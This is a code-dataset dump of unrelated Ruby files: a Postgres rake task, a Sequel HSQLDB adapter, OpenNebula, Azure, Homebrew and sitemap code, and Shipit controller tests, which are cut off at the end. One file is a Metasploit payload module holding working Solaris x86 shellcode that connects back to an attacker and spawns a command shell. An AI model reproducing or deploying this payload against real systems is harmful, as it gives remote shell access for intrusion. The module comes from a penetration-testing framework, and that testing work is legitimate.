macports_postgres_version = File.basename(File.dirname(macports_postgres_path))
puts "Found MacPorts #{macports_postgres_version}"
ENV['PATH'] = "#{macports_postgres_path}:#{ENV['PATH']}"
end
# Homebrew Handling (TODO)
end
desc 'create a dump of the current local database'
task dump_local: ['setup_path'] do
if username.blank?
system "pg_dump -T schema_migrations -E UTF8 -a -f #{data_file} -h #{host} #{database_name}"
else
system "pg_dump -T schema_migrations -E UTF8 -a -f #{data_file} -U #{username} -h #{host} #{database_name}"
end
end
desc 'load the source controlled db dump and schema into the local db, blowing away what is currently there'
task load_local: ['setup_path', 'db:drop', 'db:create', 'db:structure:load'] do
download_data_dump(data_file)
system "psql -h #{host} -d #{database_name} -f #{data_file}"
Rails.cache.clear
end
desc 'create a new data snapshot'
task :create_snapshot, [:message, :version_type] do |t, args|
args.with_defaults(version_type: :patch)
raise 'You must supply a commit message!' unless args[:message]
Rake::Task['dgidb:dump_local'].execute
in_git_stash do
pull_latest
new_version = update_version(version_file, args[:version_type].to_sym)
commit_db_update(data_submodule_path, data_file, args[:message])
commit_data_submodule_update(args[:message], data_submodule_path, version_file)
create_tag(new_version)
push_changes
end
end
end
| 38.853333 | 113 | 0.715511 |
b9914774d85c9a2b3c14c25a15c0c741cc6e8967 | 6,782 | Sequel.require 'adapters/jdbc/transactions'
module Sequel
module JDBC
# Database and Dataset support for HSQLDB databases accessed via JDBC.
module HSQLDB
# Instance methods for HSQLDB Database objects accessed via JDBC.
module DatabaseMethods
PRIMARY_KEY_INDEX_RE = /\Asys_idx_sys_pk_/i.freeze
include ::Sequel::JDBC::Transactions
# HSQLDB uses the :hsqldb database type.
def database_type
:hsqldb
end
# HSQLDB uses an IDENTITY sequence as the default value for primary
# key columns.
def serial_primary_key_options
{:primary_key => true, :type => :integer, :identity=>true, :start_with=>1}
end
# The version of the database, as an integer (e.g 2.2.5 -> 20205)
def db_version
@db_version ||= begin
v = get{DATABASE_VERSION(){}}
if v =~ /(\d+)\.(\d+)\.(\d+)/
$1.to_i * 10000 + $2.to_i * 100 + $3.to_i
end
end
end
private
# HSQLDB specific SQL for renaming columns, and changing column types and/or nullity.
def alter_table_sql(table, op)
case op[:op]
when :rename_column
"ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(op[:name])} RENAME TO #{quote_identifier(op[:new_name])}"
when :set_column_type
"ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(op[:name])} SET DATA TYPE #{type_literal(op)}"
when :set_column_null
"ALTER TABLE #{quote_schema_table(table)} ALTER COLUMN #{quote_identifier(op[:name])} SET #{op[:null] ? 'NULL' : 'NOT NULL'}"
else
super
end
end
# HSQLDB requires parens around the SELECT, and the WITH DATA syntax.
def create_table_as_sql(name, sql, options)
"#{create_table_prefix_sql(name, options)} AS (#{sql}) WITH DATA"
end
# Use IDENTITY() to get the last inserted id.
def last_insert_id(conn, opts={})
statement(conn) do |stmt|
sql = 'CALL IDENTITY()'
rs = log_yield(sql){stmt.executeQuery(sql)}
rs.next
rs.getInt(1)
end
end
# Primary key indexes appear to start with sys_idx_sys_pk_ on HSQLDB
def primary_key_index_re
PRIMARY_KEY_INDEX_RE
end
# If an :identity option is present in the column, add the necessary IDENTITY SQL.
# It's possible to use an IDENTITY type, but that defaults the sequence to start
# at 0 instead of 1, and we don't want that.
def type_literal(column)
if column[:identity]
sql = "#{super} GENERATED BY DEFAULT AS IDENTITY"
if sw = column[:start_with]
sql << " (START WITH #{sw.to_i}"
sql << " INCREMENT BY #{column[:increment_by].to_i}" if column[:increment_by]
sql << ")"
end
sql
else
super
end
end
end
# Dataset class for HSQLDB datasets accessed via JDBC.
class Dataset < JDBC::Dataset
BITWISE_METHOD_MAP = {:& =>:BITAND, :| => :BITOR, :^ => :BITXOR}
BOOL_TRUE = 'TRUE'.freeze
BOOL_FALSE = 'FALSE'.freeze
# HSQLDB does support common table expressions, but the support is broken.
# CTEs operate more like temprorary tables or views, lasting longer than the duration of the expression.
# CTEs in earlier queries might take precedence over CTEs with the same name in later queries.
# Also, if any CTE is recursive, all CTEs must be recursive.
# If you want to use CTEs with HSQLDB, you'll have to manually modify the dataset to allow it.
SELECT_CLAUSE_METHODS = clause_methods(:select, %w'select distinct columns from join where group having compounds order limit lock')
SQL_WITH_RECURSIVE = "WITH RECURSIVE ".freeze
APOS = Dataset::APOS
HSTAR = "H*".freeze
BLOB_OPEN = "X'".freeze
BITCOMP_OPEN = "((0 - ".freeze
BITCOMP_CLOSE = ") - 1)".freeze
DEFAULT_FROM = " FROM (VALUES (0))".freeze
TIME_FORMAT = "'%H:%M:%S'".freeze
# Handle HSQLDB specific case insensitive LIKE and bitwise operator support.
def complex_expression_sql_append(sql, op, args)
case op
when :ILIKE, :"NOT ILIKE"
super(sql, (op == :ILIKE ? :LIKE : :"NOT LIKE"), [SQL::Function.new(:ucase, args.at(0)), SQL::Function.new(:ucase, args.at(1)) ])
when :&, :|, :^
op = BITWISE_METHOD_MAP[op]
sql << complex_expression_arg_pairs(args){|a, b| literal(SQL::Function.new(op, a, b))}
when :<<
sql << complex_expression_arg_pairs(args){|a, b| "(#{literal(a)} * POWER(2, #{literal(b)}))"}
when :>>
sql << complex_expression_arg_pairs(args){|a, b| "(#{literal(a)} / POWER(2, #{literal(b)}))"}
when :%
sql << complex_expression_arg_pairs(args){|a, b| "MOD(#{literal(a)}, #{literal(b)})"}
when :'B~'
sql << BITCOMP_OPEN
literal_append(sql, args.at(0))
sql << BITCOMP_CLOSE
else
super
end
end
# HSQLDB requires recursive CTEs to have column aliases.
def recursive_cte_requires_column_aliases?
true
end
# HSQLDB does not support IS TRUE.
def supports_is_true?
false
end
private
# Use string in hex format for blob data.
def literal_blob_append(sql, v)
sql << BLOB_OPEN << v.unpack(HSTAR).first << APOS
end
# HSQLDB uses FALSE for false values.
def literal_false
BOOL_FALSE
end
# HSQLDB handles fractional seconds in timestamps, but not in times
def literal_sqltime(v)
v.strftime(TIME_FORMAT)
end
# HSQLDB uses TRUE for true values.
def literal_true
BOOL_TRUE
end
# HSQLDB does not support CTEs well enough for Sequel to enable support for them.
def select_clause_methods
SELECT_CLAUSE_METHODS
end
# Use a default FROM table if the dataset does not contain a FROM table.
def select_from_sql(sql)
if @opts[:from]
super
else
sql << DEFAULT_FROM
end
end
# Use WITH RECURSIVE instead of WITH if any of the CTEs is recursive
def select_with_sql_base
opts[:with].any?{|w| w[:recursive]} ? SQL_WITH_RECURSIVE : super
end
end
end
end
end
| 36.659459 | 143 | 0.58095 |
38990d00abf3c1e69e20f4c040317fe0f0d09b2d | 4,500 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Solaris
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Solaris Command Shell, Reverse TCP Inline',
'Description' => 'Connect back to attacker and spawn a command shell',
'Author' => 'Ramon de C Valle',
'License' => MSF_LICENSE,
'Platform' => 'solaris',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShellUnix,
'Payload' =>
{
'Offsets' =>
{
'LHOST' => [ 15, 'ADDR' ],
'LPORT' => [ 21, 'n' ],
},
'Payload' =>
"\x68\xff\xd8\xff\x3c" +# pushl $0x3cffd8ff #
"\x6a\x65" +# pushl $0x65 #
"\x89\xe6" +# movl %esp,%esi #
"\xf7\x56\x04" +# notl 0x04(%esi) #
"\xf6\x16" +# notb (%esi) #
"\x68\x7f\x01\x01\x01" +# pushl $0x0101017f #
"\x66\x68\x04\xd2" +# pushw $0xd204 #
"\x66\x6a\x02" +# pushw $0x02 #
"\x89\xe7" +# movl %esp,%edi #
"\x6a\x02" +# pushl $0x02 #
"\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x6a\x02" +# pushl $0x02 #
"\x6a\x02" +# pushl $0x02 #
"\xb0\xe6" +# movb $0xe6,%al #
"\xff\xd6" +# call *%esi #
"\x6a\x10" +# pushl $0x10 #
"\x57" +# pushl %edi #
"\x50" +# pushl %eax #
"\x31\xc0" +# xorl %eax,%eax #
"\xb0\xeb" +# movb $0xeb,%al #
"\xff\xd6" +# call *%esi #
"\x5b" +# popl %ebx #
"\x53" +# pushl %ebx #
"\x6a\x09" +# pushl $0x09 #
"\x53" +# pushl %ebx #
"\x6a\x3e" +# pushl $0x3e #
"\x58" +# popl %eax #
"\xff\xd6" +# call *%esi #
"\xff\x4f\xe0" +# decl -0x20(%edi) #
"\x79\xf6" +# jns <cntsockcode+57> #
"\x50" +# pushl %eax #
"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
"\x89\xe3" +# movl %esp,%ebx #
"\x50" +# pushl %eax #
"\x53" +# pushl %ebx #
"\x89\xe1" +# movl %esp,%ecx #
"\x50" +# pushl %eax #
"\x51" +# pushl %ecx #
"\x53" +# pushl %ebx #
"\xb0\x3b" +# movb $0x3b,%al #
"\xff\xd6" # call *%esi #
}
))
end
end
| 53.571429 | 78 | 0.292889 |
6266f936ec858a8b12e06b4a87a56a8cc4c243c3 | 3,154 | # -------------------------------------------------------------------------- #
# Copyright 2002-2022, OpenNebula Project, OpenNebula Systems #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#--------------------------------------------------------------------------- #
require 'opennebula/pool'
module OpenNebula
# Class representing a HookPool
class HookPool < Pool
#######################################################################
# Constants and Class attribute accessors
#######################################################################
HOOK_POOL_METHODS = {
:info => 'hookpool.info'
}
#######################################################################
# Class constructor & Pool Methods
#######################################################################
# +client+ a Client object that represents an XML-RPC connection
# +user_id+ used to refer to a Pool with Templates from that user
def initialize(client, user_id = -1)
super('HOOK_POOL', 'HOOK', client)
@user_id = user_id
end
# Factory method to create Template objects
def factory(element_xml)
OpenNebula::Hook.new(element_xml, @client)
end
#######################################################################
# XML-RPC Methods for the Template Object
#######################################################################
# Retrieves all or part of the Templates in the pool.
def info(*args)
case args.size
when 0
info_filter(HOOK_POOL_METHODS[:info], @user_id, -1, -1)
when 3
info_filter(HOOK_POOL_METHODS[:info], args[0], args[1], args[2])
end
end
def info_all
super(HOOK_POOL_METHODS[:info])
end
def info_mine
super(HOOK_POOL_METHODS[:info])
end
def info_group
super(HOOK_POOL_METHODS[:info])
end
alias :info! info
alias :info_all! info_all
alias :info_mine! info_mine
alias :info_group! info_group
end
end
| 38 | 80 | 0.417565 |
e86fc264bf6cc2c56fe5f9b5d259106b976b9cd5 | 404 | module Imgproxy
module OptionsExtractors
# Extracts group of options and trim nils from the end
class Group
def initialize(*extractors)
@extractors = extractors
end
def extract(raw)
values = @extractors.map { |extractor| extractor.extract(raw) }
values.delete_at(-1) while !values.empty? && values.last.nil?
values
end
end
end
end
| 23.764706 | 71 | 0.641089 |
3326ecceba4087c11b11eaaec242696ae837da57 | 148 | class SalaryQuestionPresenter < QuestionPresenter
def response_label(value)
value_for_interpolation(SmartAnswer::Salary.new(value))
end
end
| 24.666667 | 59 | 0.817568 |
08185cf89f5272f04a196ebde44119e179288e32 | 2,583 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Dns::Mgmt::V2016_04_01
module Models
#
# The resource model definition for a ARM tracked top level resource
#
class TrackedResource < Resource
include MsRestAzure
# @return [Hash{String => String}] Resource tags.
attr_accessor :tags
# @return [String] The geo-location where the resource lives
attr_accessor :location
#
# Mapper for TrackedResource class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'TrackedResource',
type: {
name: 'Composite',
class_name: 'TrackedResource',
model_properties: {
id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
location: {
client_side_validation: true,
required: true,
serialized_name: 'location',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 27.774194 | 72 | 0.44096 |
38015c6452b712a8eed370d8ad3a5b6469d6682d | 5,047 | #
# Be sure to run `pod spec lint LSDateFormat.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
s.name = "LSDateFormat"
s.version = "0.0.1"
s.summary = "A short description of LSDateFormat."
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
DESC
s.homepage = "http://EXAMPLE/LSDateFormat"
# s.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Licensing your code is important. See http://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
s.license = "MIT (example)"
# s.license = { :type => "MIT", :file => "FILE_LICENSE" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
s.author = { "Crazy_Lin" => "[email protected]" }
# Or just: s.author = "Crazy_Lin"
# s.authors = { "Crazy_Lin" => "[email protected]" }
# s.social_media_url = "http://twitter.com/Crazy_Lin"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
# s.platform = :ios
# s.platform = :ios, "5.0"
# When using multiple platforms
# s.ios.deployment_target = "5.0"
# s.osx.deployment_target = "10.7"
# s.watchos.deployment_target = "2.0"
# s.tvos.deployment_target = "9.0"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
s.source = { :git => "http://EXAMPLE/LSDateFormat.git", :tag => "#{s.version}" }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# CocoaPods is smart about how it includes source code. For source files
# giving a folder will include any swift, h, m, mm, c & cpp files.
# For header files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
s.source_files = "Classes", "Classes/**/*.{h,m}"
s.exclude_files = "Classes/Exclude"
# s.public_header_files = "Classes/**/*.h"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# s.resource = "icon.png"
# s.resources = "Resources/*.png"
# s.preserve_paths = "FilesToSave", "MoreFilesToSave"
# ――― Project Linking ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
# s.framework = "SomeFramework"
# s.frameworks = "SomeFramework", "AnotherFramework"
# s.library = "iconv"
# s.libraries = "iconv", "xml2"
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
# s.requires_arc = true
# s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# s.dependency "JSONKit", "~> 1.4"
end
| 36.572464 | 93 | 0.59045 |
e2b79a66188639aa04821eb831114a86a2aa59fe | 1,423 | class Bitchx < Formula
desc "BitchX IRC client"
homepage "http://bitchx.sourceforge.net/"
url "https://downloads.sourceforge.net/project/bitchx/ircii-pana/bitchx-1.2.1/bitchx-1.2.1.tar.gz"
sha256 "2d270500dd42b5e2b191980d584f6587ca8a0dbda26b35ce7fadb519f53c83e2"
bottle do
sha256 "ebb3d7dd9342843c47964d4c545e76136aeb4e200f9495cd2767d0e31fc37181" => :yosemite
sha256 "494fd5d6084f70158e82d49a067439770935d5aeeb6223d1c229a27e6f7f9e8f" => :mavericks
sha256 "f0d7c9d8eaccd526c39037903121e1e6a026ce93988610ed32ad3b5f864fb630" => :mountain_lion
end
depends_on "openssl"
def install
plugins = %w[acro aim arcfour amp autocycle blowfish cavlink encrypt
fserv hint identd nap pkga possum qbx qmail]
args = %W[
--prefix=#{prefix}
--with-ssl
--with-plugins=#{plugins * ","}
--enable-ipv6
--mandir=#{man}
]
system "./configure", *args
system "make"
system "make", "install"
end
def caveats; <<-EOS.undent
On case-sensitive filesytems, it is necessary to run `BitchX` not `bitchx`.
For best visual appearance, your terminal emulator may need:
* Character encoding set to Western (ISO Latin 1).
(or a similar, compatible encoding)
* A font capable of extended ASCII characters:
See: https://www.google.com/search?q=perfect+dos+vga+437
EOS
end
test do
system bin/"BitchX", "-v"
end
end
| 31.622222 | 100 | 0.704146 |
1a6446ff2ef2cf0fdb8c83ba6c7cad08ad007461 | 2,202 | class OptQuestionsController < ApplicationController
#
# skip_before_filter :authorize
# skip_before_filter :authorize2
#
# def new
# @user = User.find(params[:user_id])
# @event = Event.find(params[:event_id])
# @optq = @event.opt_questions.new
#
# respond_to do |format|
# format.html # new.html.erb
# format.json { render json: @event }
# end
# end
#
# def create
# @event = Event.find(params[:event_id])
# @user = @event.user_id
# @optq = @event.opt_questions.create(params[:opt_question])
# @oq_id = @optq.id
# @event_id = @event.id
# @questions = @event.text_questions + @event.bool_questions + @event.opt_questions
#
# # questions nach position sortieren
# @questions = @questions.sort_by{ |q| q.position.to_i }
# i=0
# @questions.each do |q|
# q.update_attributes(:position => i)
# i+=1
# end
#
# @event.update_attribute(:questions_count, @event.questions_count+1)
#
# respond_to do |format|
# format.html { redirect_to user_event_path(@user, @event)}
# format.js
# end
# end
#
# def show
# @event = Event.find(params[:event_id])
# @user = @event.user_id
# redirect_to user_event_path(@user, @event)
# end
#
# def update
# @event = Event.find(params[:event_id])
# @user = @event.user_id
# @question = OptQuestion.find(params[:id])
#
# respond_to do |format|
# if @event.update_attributes(params[:opt_question])
# format.json { respond_with_bip(@question) }
# else
# format.json { respond_with_bip(@question) }
# end
# end
# end
#
# def destroy
# @optq = OptQuestion.find(params[:id])
# @oq_id = @optq.position
# @event = Event.find(params[:event_id])
# @user = @event.user_id
# @optq.destroy
#
# respond_to do |format|
# format.html { redirect_to user_event_path(@user, @event)}
# format.js
# end
# end
#
# def index
# @event = Event.find(params[:event_id])
# @user = @event.user_id
# @optq = OptQuestion.find(params[:id])
# redirect_to user_event_path(@user, @event)
# end
#
end
| 26.853659 | 87 | 0.599001 |
ed44d2242d9371fb5e3b695d5cf8f80aff4bd9c1 | 49 | module Responders
VERSION = "0.4.8".freeze
end
| 12.25 | 26 | 0.714286 |
bb89bdcfb95971e8653a7ce4f9d95f2ba4da73d9 | 6,164 | module XmlSitemap
class Item
DEFAULT_PRIORITY = 0.5
# ISO8601 regex from here: http://www.pelagodesign.com/blog/2009/05/20/iso-8601-date-validation-that-doesnt-suck/
ISO8601_REGEX = /^([\+-]?\d{4}(?!\d{2}\b))((-?)((0[1-9]|1[0-2])(\3([12]\d|0[1-9]|3[01]))?|W([0-4]\d|5[0-2])(-?[1-7])?|(00[1-9]|0[1-9]\d|[12]\d{2}|3([0-5]\d|6[1-6])))([T\s]((([01]\d|2[0-3])((:?)[0-5]\d)?|24\:?00)([\.,]\d+(?!:))?)?(\17[0-5]\d([\.,]\d+)?)?([zZ]|([\+-])([01]\d|2[0-3]):?([0-5]\d)?)?)?)?$/
attr_reader :target, :updated, :priority, :changefreq, :validate_time, :alternates, :image_location, :image_caption, :image_geolocation, :image_title, :image_license,
:video_thumbnail_location, :video_title, :video_description, :video_content_location, :video_player_location,
:video_duration, :video_expiration_date, :video_rating, :video_view_count, :video_publication_date, :video_family_friendly, :video_category,
:video_restriction, :video_gallery_location, :video_price, :video_requires_subscription, :video_uploader, :video_platform, :video_live
def initialize(target, opts={})
@target = target.to_s.strip
@updated = opts[:updated] || Time.now
@priority = opts[:priority]
@changefreq = opts[:period]
@validate_time = (opts[:validate_time] != false)
@alternates = opts[:alternates]
# Refer to http://support.google.com/webmasters/bin/answer.py?hl=en&answer=178636 for requirement to support images in sitemap
@image_location = opts[:image_location]
@image_caption = opts[:image_caption]
@image_geolocation = opts[:image_geolocation]
@image_title = opts[:image_title]
@image_license = opts[:image_license]
# Refer to http://support.google.com/webmasters/bin/answer.py?hl=en&answer=80472&topic=10079&ctx=topic#2 for requirement to support videos in sitemap
@video_thumbnail_location = opts[:video_thumbnail_location]
@video_title = opts[:video_title]
@video_description = opts[:video_description]
@video_content_location = opts[:video_content_location]
@video_player_location = opts[:video_player_location]
@video_duration = opts[:video_duration]
@video_expiration_date = opts[:video_expiration_date]
@video_rating = opts[:video_rating]
@video_view_count = opts[:video_view_count]
@video_publication_date = opts[:video_publication_date]
@video_family_friendly = opts[:video_family_friendly]
# tag
@video_category = opts[:video_category]
@video_restriction = opts[:video_restriction]
@video_gallery_location = opts[:video_gallery_location]
@video_price = opts[:video_price]
@video_requires_subscription = opts[:video_requires_subscription]
@video_uploader = opts[:video_uploader]
@video_platform = opts[:video_platform]
@video_live = opts[:video_live]
if @changefreq
@changefreq = @changefreq.to_sym
unless XmlSitemap::PERIODS.include?(@changefreq)
raise ArgumentError, "Invalid :period value '#{@changefreq}'"
end
end
unless @updated.is_a?(Time) || @updated.is_a?(Date) || @updated.is_a?(String)
raise ArgumentError, 'Time, Date, or ISO8601 String required for :updated!'
end
if @validate_time && @updated.is_a?(String) && !(@updated =~ ISO8601_REGEX)
raise ArgumentError, 'String provided to :updated did not match ISO8601 standard!'
end
@updated = @updated.to_time if @updated.is_a?(Date)
##############################################################################################
##############################################################################################
unless @video_expiration_date.is_a?(Time) || @video_expiration_date.is_a?(Date) || @video_expiration_date.is_a?(String)
raise ArgumentError, "Time, Date, or ISO8601 String required for :video_expiration_date!" unless @video_expiration_date.nil?
end
if @validate_time && @video_expiration_date.is_a?(String) && !(@video_expiration_date =~ ISO8601_REGEX)
raise ArgumentError, "String provided to :video_expiration_date did not match ISO8601 standard!"
end
@video_expiration_date = @video_expiration_date.to_time if @video_expiration_date.is_a?(Date)
##############################################################################################
##############################################################################################
unless @video_publication_date.is_a?(Time) || @video_publication_date.is_a?(Date) || @video_publication_date.is_a?(String)
raise ArgumentError, "Time, Date, or ISO8601 String required for :video_publication_date!" unless @video_publication_date.nil?
end
if @validate_time && @video_publication_date.is_a?(String) && !(@video_publication_date =~ ISO8601_REGEX)
raise ArgumentError, "String provided to :video_publication_date did not match ISO8601 standard!"
end
@video_publication_date = @video_publication_date.to_time if @video_publication_date.is_a?(Date)
end
# Returns the timestamp value of lastmod for renderer
#
def lastmod_value
if @updated.is_a?(Time)
@updated.utc.iso8601
else
@updated.to_s
end
end
# Returns the timestamp value of video:expiration_date for renderer
#
def video_expiration_date_value
if @video_expiration_date.is_a?(Time)
@video_expiration_date.utc.iso8601
else
@video_expiration_date.to_s
end
end
# Returns the timestamp value of video:publication_date for renderer
#
def video_publication_date_value
if @video_publication_date.is_a?(Time)
@video_publication_date.utc.iso8601
else
@video_publication_date.to_s
end
end
end
end
| 49.312 | 305 | 0.612914 |
5d4a8eb46dc1b63f322f31a500e9e982b25e48fc | 179 | # Chef InSpec test for recipe log_hello::default
# The Chef InSpec reference, with examples and extensive documentation, can be
# found at https://docs.chef.io/inspec/resources/
| 35.8 | 78 | 0.782123 |
08b57de1bd9bad7b0ed00115a0b627239a7ddeee | 1,040 | require File.expand_path(File.dirname(__FILE__))+'/../../test_helper'
class RedisFollowStoreTest < Test::Unit::TestCase
context "RedisStores::Follow" do
setup do
use_redis_store
@klass = Socialization::RedisStores::Follow
@base = Socialization::RedisStores::Base
end
context "method aliases" do
should "be set properly and made public" do
# TODO: Can't figure out how to test method aliases properly. The following doesn't work:
# assert @klass.method(:follow!) == @base.method(:relation!)
assert_method_public @klass, :follow!
assert_method_public @klass, :unfollow!
assert_method_public @klass, :follows?
assert_method_public @klass, :followers_relation
assert_method_public @klass, :followers
assert_method_public @klass, :followables_relation
assert_method_public @klass, :followables
assert_method_public @klass, :remove_followers
assert_method_public @klass, :remove_followables
end
end
end
end | 38.518519 | 97 | 0.699038 |
bb3baa8eab7b9980a20ff2d86c4e92376593145d | 1,168 | class Zint < Formula
desc "Barcode encoding library supporting over 50 symbologies"
homepage "http://www.zint.org.uk/"
url "https://downloads.sourceforge.net/project/zint/zint/2.9.0/zint-2.9.0.tar.gz"
sha256 "fa02fa637f1cecb242bcc751f02710cda4026d41f8f60e0c60a8884525e56fea"
license "GPL-3.0"
head "https://git.code.sf.net/p/zint/code.git"
bottle do
cellar :any
sha256 "18c124be12f21675b75c0fffca89bc9b219ab275f95fcd50bf96ccd7ca55195e" => :catalina
sha256 "4860681d8e49db5793ffff5f54a5fd3c08b4a64ecea55683e9ed8d29f52e1a2f" => :mojave
sha256 "ff0ffd2099c20c6574ddab3bd2a89eff262eda7b884a9c4983177d05fc7769df" => :high_sierra
sha256 "f315bee8a283baa4b265d51ed5bac4b9807bf1978750777503f503ef67b70974" => :x86_64_linux
end
depends_on "cmake" => :build
depends_on "libpng"
def install
# Sandbox fix: install FindZint.cmake in zint's prefix, not cmake's.
inreplace "CMakeLists.txt", "${CMAKE_ROOT}", "#{share}/cmake"
mkdir "zint-build" do
system "cmake", "..", *std_cmake_args
system "make", "install"
end
end
test do
system "#{bin}/zint", "-o", "test-zing.png", "-d", "This Text"
end
end
| 34.352941 | 94 | 0.732877 |
080e7544d2d5f1cb013aecd2b1517aec023c0d58 | 7,704 | # frozen_string_literal: true
require 'test_helper'
module Shipit
class StacksControllerTest < ActionController::TestCase
setup do
@routes = Shipit::Engine.routes
@stack = shipit_stacks(:shipit)
session[:user_id] = shipit_users(:walrus).id
end
test "validates that Shipit.github is present" do
Rails.application.secrets.stubs(:github).returns(nil)
get :index
assert_select "#github_app .missing"
assert_select ".missing", count: 1
end
test "validates that Shipit.redis_url is present" do
Shipit.stubs(redis_url: nil)
get :index
assert_select "#redis_url .missing"
assert_select ".missing", count: 1
end
test "validates that Shipit.host is present" do
Shipit.stubs(host: nil)
get :index
assert_select "#host .missing"
assert_select ".missing", count: 1
end
test "GitHub authentication is mandatory" do
session[:user_id] = nil
get :index
assert_redirected_to '/github/auth/github?origin=http%3A%2F%2Ftest.host%2F'
end
test "current_user must be a member of at least a Shipit.github_teams" do
session[:user_id] = shipit_users(:bob).id
Shipit.stubs(:github_teams).returns([shipit_teams(:cyclimse_cooks), shipit_teams(:shopify_developers)])
get :index
assert_response :forbidden
assert_equal(
'You must be a member of cyclimse/cooks or shopify/developers to access this application.',
response.body,
)
end
test "#index list all stacks" do
get :index, params: { show_archived: true }
assert_response :ok
assert_select ".stack", count: Stack.count
end
test "#index list all not archived stacks" do
get :index
assert_response :ok
assert_select ".stack", count: Stack.not_archived.count
end
test "#index list a repo stacks if the :repo params is passed" do
repo = shipit_repositories(:shipit)
get :index, params: { repo: repo.full_name }
assert_response :ok
assert_select ".stack", count: repo.stacks.count
end
test "#show is success" do
get :show, params: { id: @stack.to_param }
assert_response :ok
end
test "#show with faulty and validating deploys is success" do
get :show, params: { id: shipit_stacks(:shipit_canaries).to_param }
assert_response :ok
end
test "#show with a single CheckRun is successful" do
@stack = shipit_stacks(:check_runs)
assert_not_equal 0, CheckRun.where(stack_id: @stack.id).count
get :show, params: { id: @stack.to_param }
assert_response :ok
end
test "#show handles locked stacks without a lock_author" do
@stack.update!(lock_reason: "I am a lock with no author")
get :show, params: { id: @stack.to_param }
end
test "#show auto-links URLs in lock reason" do
@stack.update!(lock_reason: 'http://google.com')
get :show, params: { id: @stack.to_param }
assert_response :ok
assert_select 'a[href="http://google.com"]'
end
test "#create creates a Stack, queues a job to setup webhooks and redirects to it" do
assert_difference "Stack.count" do
post :create, params: {
stack: {
repo_name: 'rails',
repo_owner: 'rails',
environment: 'staging',
branch: 'staging',
},
}
end
assert_redirected_to stack_path(Stack.last)
end
test "#create when not valid renders new" do
assert_no_difference "Stack.count" do
post :create, params: { stack: { repo_owner: 'some', repo_name: 'owner/path' } }
end
assert_response :success
end
